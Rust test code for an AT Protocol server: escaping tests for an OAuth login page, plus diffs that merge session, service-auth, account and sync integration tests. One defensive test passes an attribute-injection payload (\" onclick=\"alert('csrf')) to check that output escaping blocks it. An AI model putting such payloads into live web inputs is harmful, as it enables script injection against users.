#[test]
fn test_html_escape_ampersand() {
let html = login_page("client&test", None, None, "test-uri", None, None);
assert!(html.contains("&amp;"), "Ampersand should be escaped");
assert!(
!html.contains("client&test"),
"Raw ampersand should not appear in output"
);
}
#[test]
fn test_html_escape_quotes() {
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
assert!(
html.contains("&quot;") || html.contains("&#34;"),
"Double quotes should be escaped"
);
assert!(
html.contains("&#39;") || html.contains("&apos;"),
"Single quotes should be escaped"
);
}
#[test]
fn test_html_escape_angle_brackets() {
let html = login_page("client<test>more", None, None, "test-uri", None, None);
assert!(html.contains("&lt;"), "Less than should be escaped");
assert!(html.contains("&gt;"), "Greater than should be escaped");
assert!(
!html.contains("<test>"),
"Raw angle brackets should not appear"
);
}
#[test]
fn test_oauth_template_preserves_safe_content() {
let html = login_page(
"my-safe-client",
Some("My Safe App"),
Some("read write"),
"valid-uri",
None,
Some("user@example.com"),
);
assert!(
html.contains("my-safe-client") || html.contains("My Safe App"),
"Safe content should be preserved"
);
assert!(
html.contains("read write") || html.contains("read"),
"Scope should be preserved"
);
assert!(
html.contains("user@example.com"),
"Login hint should be preserved"
);
}
#[test]
fn test_csrf_like_input_value_protection() {
let malicious = "\" onclick=\"alert('csrf')";
let html = login_page("client", None, None, malicious, None, None);
assert!(
!html.contains("onclick=\"alert"),
"Event handlers should not be executable"
);
}
#[test]
fn test_unicode_handling_in_templates() {
let unicode_client = "客户端 クライアント";
let html = login_page(unicode_client, None, None, "test-uri", None, None);
assert!(
html.contains("客户端") || html.contains("&#"),
"Unicode should be preserved or encoded"
);
}
#[test]
fn test_null_byte_in_input() {
let with_null = "client\0id";
let sanitized = sanitize_header_value(with_null);
assert!(
sanitized.contains("client"),
"Content before null should be preserved"
);
}
#[test]
fn test_very_long_input_handling() {
let long_input = "x".repeat(10000);
let sanitized = sanitize_header_value(&long_input);
assert!(
!sanitized.is_empty(),
"Long input should still produce output"
);
}

View File

@@ -6,384 +6,118 @@ use reqwest::StatusCode;
use serde_json::{Value, json};
#[tokio::test]
async fn test_health() {
async fn test_server_basics() {
let client = client();
let res = client
.get(format!("{}/health", base_url().await))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
assert_eq!(res.text().await.unwrap(), "OK");
}
#[tokio::test]
async fn test_describe_server() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.describeServer",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
let base = base_url().await;
let health = client.get(format!("{}/health", base)).send().await.unwrap();
assert_eq!(health.status(), StatusCode::OK);
assert_eq!(health.text().await.unwrap(), "OK");
let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap();
assert_eq!(describe.status(), StatusCode::OK);
let body: Value = describe.json().await.unwrap();
assert!(body.get("availableUserDomains").is_some());
}
#[tokio::test]
async fn test_create_session() {
async fn test_account_and_session_lifecycle() {
let client = client();
let base = base_url().await;
let handle = format!("user_{}", uuid::Uuid::new_v4());
let payload = json!({
"handle": handle,
"email": format!("{}@example.com", handle),
"password": "password"
});
let create_res = client
.post(format!(
"{}/xrpc/com.atproto.server.createAccount",
base_url().await
))
.json(&payload)
.send()
.await
.expect("Failed to create account");
let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" });
let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
.json(&payload).send().await.unwrap();
assert_eq!(create_res.status(), StatusCode::OK);
let create_body: Value = create_res.json().await.unwrap();
let did = create_body["did"].as_str().unwrap();
let _ = verify_new_account(&client, did).await;
let payload = json!({
"identifier": handle,
"password": "password"
});
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.createSession",
base_url().await
))
.json(&payload)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert!(body.get("accessJwt").is_some());
let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
.json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap();
assert_eq!(login.status(), StatusCode::OK);
let login_body: Value = login.json().await.unwrap();
let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string();
let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string();
let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base))
.bearer_auth(&refresh_jwt).send().await.unwrap();
assert_eq!(refresh.status(), StatusCode::OK);
let refresh_body: Value = refresh.json().await.unwrap();
assert!(refresh_body["accessJwt"].as_str().is_some());
assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt);
assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt);
let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
.json(&json!({ "password": "password" })).send().await.unwrap();
assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY);
let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
.json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" }))
.send().await.unwrap();
assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST);
let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base))
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED);
let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base))
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_create_session_missing_identifier() {
let client = client();
let payload = json!({
"password": "password"
});
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.createSession",
base_url().await
))
.json(&payload)
.send()
.await
.expect("Failed to send request");
assert!(
res.status() == StatusCode::BAD_REQUEST || res.status() == StatusCode::UNPROCESSABLE_ENTITY,
"Expected 400 or 422 for missing identifier, got {}",
res.status()
);
}
#[tokio::test]
async fn test_create_account_invalid_handle() {
let client = client();
let payload = json!({
"handle": "invalid!handle.com",
"email": "test@example.com",
"password": "password"
});
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.createAccount",
base_url().await
))
.json(&payload)
.send()
.await
.expect("Failed to send request");
assert_eq!(
res.status(),
StatusCode::BAD_REQUEST,
"Expected 400 for invalid handle chars"
);
}
#[tokio::test]
async fn test_get_session() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.getSession",
base_url().await
))
.bearer_auth(AUTH_TOKEN)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_refresh_session() {
let client = client();
let handle = format!("refresh_user_{}", uuid::Uuid::new_v4());
let payload = json!({
"handle": handle,
"email": format!("{}@example.com", handle),
"password": "password"
});
let create_res = client
.post(format!(
"{}/xrpc/com.atproto.server.createAccount",
base_url().await
))
.json(&payload)
.send()
.await
.expect("Failed to create account");
assert_eq!(create_res.status(), StatusCode::OK);
let create_body: Value = create_res.json().await.unwrap();
let did = create_body["did"].as_str().unwrap();
let _ = verify_new_account(&client, did).await;
let login_payload = json!({
"identifier": handle,
"password": "password"
});
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.createSession",
base_url().await
))
.json(&login_payload)
.send()
.await
.expect("Failed to login");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Invalid JSON");
let refresh_jwt = body["refreshJwt"]
.as_str()
.expect("No refreshJwt")
.to_string();
let access_jwt = body["accessJwt"]
.as_str()
.expect("No accessJwt")
.to_string();
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.refreshSession",
base_url().await
))
.bearer_auth(&refresh_jwt)
.send()
.await
.expect("Failed to refresh");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Invalid JSON");
assert!(body["accessJwt"].as_str().is_some());
assert!(body["refreshJwt"].as_str().is_some());
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
}
#[tokio::test]
async fn test_delete_session() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.deleteSession",
base_url().await
))
.bearer_auth(AUTH_TOKEN)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_get_service_auth_success() {
async fn test_service_auth() {
let client = client();
let base = base_url().await;
let (access_jwt, did) = create_account_and_login(&client).await;
let params = [("aud", "did:web:example.com")];
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.getServiceAuth",
base_url().await
))
.bearer_auth(&access_jwt)
.query(&params)
.send()
.await
.expect("Failed to send request");
let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert!(body["token"].is_string());
let body: Value = res.json().await.unwrap();
let token = body["token"].as_str().unwrap();
let parts: Vec<&str> = token.split('.').collect();
assert_eq!(parts.len(), 3, "Token should be a valid JWT");
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
let claims: Value = serde_json::from_slice(&payload_bytes).unwrap();
assert_eq!(claims["iss"], did);
assert_eq!(claims["sub"], did);
assert_eq!(claims["aud"], "did:web:example.com");
let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")])
.send().await.unwrap();
assert_eq!(lxm_res.status(), StatusCode::OK);
let lxm_body: Value = lxm_res.json().await.unwrap();
let lxm_token = lxm_body["token"].as_str().unwrap();
let lxm_parts: Vec<&str> = lxm_token.split('.').collect();
let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap();
let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap();
assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord");
let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.query(&[("aud", "did:web:example.com")]).send().await.unwrap();
assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED);
let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.bearer_auth(&access_jwt).send().await.unwrap();
assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_service_auth_with_lxm() {
let client = client();
let (access_jwt, did) = create_account_and_login(&client).await;
let params = [
("aud", "did:web:example.com"),
("lxm", "com.atproto.repo.getRecord"),
];
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.getServiceAuth",
base_url().await
))
.bearer_auth(&access_jwt)
.query(&params)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
let token = body["token"].as_str().unwrap();
let parts: Vec<&str> = token.split('.').collect();
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
assert_eq!(claims["iss"], did);
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
}
#[tokio::test]
async fn test_get_service_auth_no_auth() {
let client = client();
let params = [("aud", "did:web:example.com")];
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.getServiceAuth",
base_url().await
))
.query(&params)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "AuthenticationRequired");
}
#[tokio::test]
async fn test_get_service_auth_missing_aud() {
async fn test_account_status_and_activation() {
let client = client();
let base = base_url().await;
let (access_jwt, _) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.getServiceAuth",
base_url().await
))
.bearer_auth(&access_jwt)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_check_account_status_success() {
let client = client();
let (access_jwt, _) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.checkAccountStatus",
base_url().await
))
.bearer_auth(&access_jwt)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
let status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
.bearer_auth(&access_jwt).send().await.unwrap();
assert_eq!(status.status(), StatusCode::OK);
let body: Value = status.json().await.unwrap();
assert_eq!(body["activated"], true);
assert_eq!(body["validDid"], true);
assert!(body["repoCommit"].is_string());
assert!(body["repoRev"].is_string());
assert!(body["indexedRecords"].is_number());
}
#[tokio::test]
async fn test_check_account_status_no_auth() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.checkAccountStatus",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "AuthenticationRequired");
}
#[tokio::test]
async fn test_activate_account_success() {
let client = client();
let (access_jwt, _) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.activateAccount",
base_url().await
))
.bearer_auth(&access_jwt)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
}
#[tokio::test]
async fn test_activate_account_no_auth() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.activateAccount",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_deactivate_account_success() {
let client = client();
let (access_jwt, _) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.deactivateAccount",
base_url().await
))
.bearer_auth(&access_jwt)
.json(&json!({}))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let unauth_status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
.send().await.unwrap();
assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED);
let activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
.bearer_auth(&access_jwt).send().await.unwrap();
assert_eq!(activate.status(), StatusCode::OK);
let unauth_activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
.send().await.unwrap();
assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED);
let deactivate = client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base))
.bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap();
assert_eq!(deactivate.status(), StatusCode::OK);
}

View File

@@ -6,285 +6,103 @@ use reqwest::StatusCode;
use serde_json::Value;
#[tokio::test]
async fn test_get_head_success() {
async fn test_get_head_comprehensive() {
let client = client();
let (did, _jwt) = setup_new_user("gethead-success").await;
let (did, jwt) = setup_new_user("gethead").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
.send().await.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert!(body["root"].is_string());
let root = body["root"].as_str().unwrap();
assert!(root.starts_with("bafy"), "Root CID should be a CID");
}
#[tokio::test]
async fn test_get_head_not_found() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", "did:plc:nonexistent12345")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "HeadNotFound");
assert!(
body["message"]
.as_str()
.unwrap()
.contains("Could not find root")
);
}
#[tokio::test]
async fn test_get_head_missing_param() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_head_empty_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", "")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_get_head_whitespace_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", " ")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_head_changes_after_record_create() {
let client = client();
let (did, jwt) = setup_new_user("gethead-changes").await;
let res1 = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
let root1 = body["root"].as_str().unwrap().to_string();
assert!(root1.starts_with("bafy"), "Root CID should be a CID");
let latest_res = client
.get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get initial head");
let body1: Value = res1.json().await.unwrap();
let head1 = body1["root"].as_str().unwrap().to_string();
.send().await.expect("Failed to get latest commit");
let latest_body: Value = latest_res.json().await.unwrap();
let latest_cid = latest_body["cid"].as_str().unwrap();
assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid");
create_post(&client, &did, &jwt, "Post to change head").await;
let res2 = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get head after record");
.send().await.expect("Failed to get head after record");
let body2: Value = res2.json().await.unwrap();
let head2 = body2["root"].as_str().unwrap().to_string();
assert_ne!(head1, head2, "Head CID should change after record creation");
let root2 = body2["root"].as_str().unwrap().to_string();
assert_ne!(root1, root2, "Head CID should change after record creation");
let not_found_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", "did:plc:nonexistent12345")])
.send().await.expect("Failed to send request");
assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST);
let error_body: Value = not_found_res.json().await.unwrap();
assert_eq!(error_body["error"], "HeadNotFound");
let missing_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.send().await.expect("Failed to send request");
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
let empty_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", "")])
.send().await.expect("Failed to send request");
assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST);
let whitespace_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", " ")])
.send().await.expect("Failed to send request");
assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_success() {
async fn test_get_checkout_comprehensive() {
let client = client();
let (did, jwt) = setup_new_user("getcheckout-success").await;
let (did, jwt) = setup_new_user("getcheckout").await;
let empty_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", did.as_str())])
.send().await.expect("Failed to send request");
assert_eq!(empty_res.status(), StatusCode::OK);
let empty_body = empty_res.bytes().await.expect("Failed to get body");
assert!(!empty_body.is_empty(), "Even empty repo should return CAR header");
create_post(&client, &did, &jwt, "Post for checkout test").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
.send().await.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
assert_eq!(
res.headers()
.get("content-type")
.and_then(|h| h.to_str().ok()),
Some("application/vnd.ipld.car")
);
assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car"));
let body = res.bytes().await.expect("Failed to get body");
assert!(!body.is_empty(), "CAR file should not be empty");
assert!(body.len() > 50, "CAR file should contain actual data");
}
#[tokio::test]
async fn test_get_checkout_not_found() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", "did:plc:nonexistent12345")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::NOT_FOUND);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "RepoNotFound");
}
#[tokio::test]
async fn test_get_checkout_missing_param() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_empty_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", "")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_empty_repo() {
let client = client();
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(!body.is_empty(), "Even empty repo should return CAR header");
}
#[tokio::test]
async fn test_get_checkout_includes_multiple_records() {
let client = client();
let (did, jwt) = setup_new_user("getcheckout-multi").await;
for i in 0..5 {
assert!(body.len() >= 2, "CAR file should have at least header length");
for i in 0..4 {
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
let multi_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(body.len() > 500, "CAR file with 5 records should be larger");
}
#[tokio::test]
async fn test_get_head_matches_latest_commit() {
let client = client();
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
let head_res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get head");
let head_body: Value = head_res.json().await.unwrap();
let head_root = head_body["root"].as_str().unwrap();
let latest_res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getLatestCommit",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get latest commit");
let latest_body: Value = latest_res.json().await.unwrap();
let latest_cid = latest_body["cid"].as_str().unwrap();
assert_eq!(
head_root, latest_cid,
"getHead root should match getLatestCommit cid"
);
}
#[tokio::test]
async fn test_get_checkout_car_header_valid() {
let client = client();
let (did, _jwt) = setup_new_user("getcheckout-header").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(
body.len() >= 2,
"CAR file should have at least header length"
);
.send().await.expect("Failed to send request");
assert_eq!(multi_res.status(), StatusCode::OK);
let multi_body = multi_res.bytes().await.expect("Failed to get body");
assert!(multi_body.len() > 500, "CAR file with 5 records should be larger");
let not_found_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", "did:plc:nonexistent12345")])
.send().await.expect("Failed to send request");
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
let error_body: Value = not_found_res.json().await.unwrap();
assert_eq!(error_body["error"], "RepoNotFound");
let missing_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.send().await.expect("Failed to send request");
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
let empty_did_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", "")])
.send().await.expect("Failed to send request");
assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST);
}